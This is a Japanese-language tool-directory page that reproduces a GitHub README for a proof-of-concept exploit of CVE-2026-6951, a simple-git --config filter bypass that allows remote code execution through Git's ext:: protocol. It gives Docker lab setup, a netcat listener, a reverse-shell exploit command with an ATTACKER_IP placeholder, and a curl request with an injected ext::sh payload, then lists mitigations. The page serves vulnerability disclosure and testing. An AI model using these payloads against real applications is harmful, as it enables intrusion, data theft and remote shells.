Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-6951 — CVE-2026-6951の概念実証エクスプロイト。simple-gitの--configフィルターバイパスにより、Git extプロトコル経由でRCEを可能にするもので、Dockerラボとリバースシェルペイロードを備えています。 | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2026-6951
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubeqstlab/cve-2026-6951

CVE-2026-6951

CVE-2026-6951の概念実証エクスプロイト。simple-gitの--configフィルターバイパスにより、Git extプロトコル経由でRCEを可能にするもので、Dockerラボとリバースシェルペイロードを備えています。

リポジトリを見る
111日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-6951 simple-git リモートコード実行

★ CVE-2026-6951 simple-git --config オプションフィルターバイパス RCE PoC ★

https://github.com/user-attachments/assets/4c992530-c5bb-4ff4-be5d-af0857eebb67


概要

CVE-2026-6951 は、CVE-2022-25912 に対する不完全な修正に起因する simple-git のリモートコード実行脆弱性です。-c オプションはブロックされていましたが、同等の --config オプションは適切に制限されていませんでした。Git 引数を制御できる攻撃者は、ext プロトコルを有効化し、ext:: リポジトリ URL を通じて任意のコマンドを実行できます。


影響を受けるバージョン

カテゴリバージョン
脆弱3.36.0 より前の simple-git バージョン
修正済みsimple-git 3.36.0 以降

この環境では simple-git 3.35.2 および @simple-git/argv-parser 1.0.3 を使用しています。


影響

  • Node.js アプリケーションの権限でのリモートコード実行
  • 機密ファイルの漏洩
  • リバースシェルアクセス
  • アプリケーションデータの変更または削除

環境

脆弱な環境をビルドして実行します。

docker build -t cve-2026-6951 .
docker run --rm -d --name cve-2026-6951 -p 9107:9107 cve-2026-6951

次の URL でサービスにアクセスします。

http://127.0.0.1:9107

サービスの状態を確認します。

curl -s http://127.0.0.1:9107/api/health

埋め込みのサンプルリポジトリは次の場所にあります。

file:///srv/git/sample.git

PoC

攻撃者システムでリスナーを起動します。

nc -lvnp 4444

エクスプロイトスクリプトを実行します。

python3 poc.py http://127.0.0.1:9107 --lhost ATTACKER_IP --lport 4444

次のリクエストは、制限されていない --config オプションと Git の ext プロトコルを悪用して id コマンドを実行します。

curl -s -X POST http://127.0.0.1:9107/api/import \
  -H 'Content-Type: application/json' \
  --data-raw '{
    "repository":"ext::sh -c id% >&2",
    "name":"id-check",
    "options":["--config","protocol.ext.allow=always"],
    "environment":{}
  }'

緩和策

  • simple-git をバージョン 3.36.0 以降にアップグレードします。
  • ユーザーが制御する Git オプションを simple-git に直接渡さないでください。
  • 信頼できるリポジトリ URL スキームのみを許可し、ext:: URL を拒否します。
  • リポジトリ URL と Git 引数に厳格な許可リスト検証を適用します。

分析

  • KR:
  • EN:
ツールをダウンロード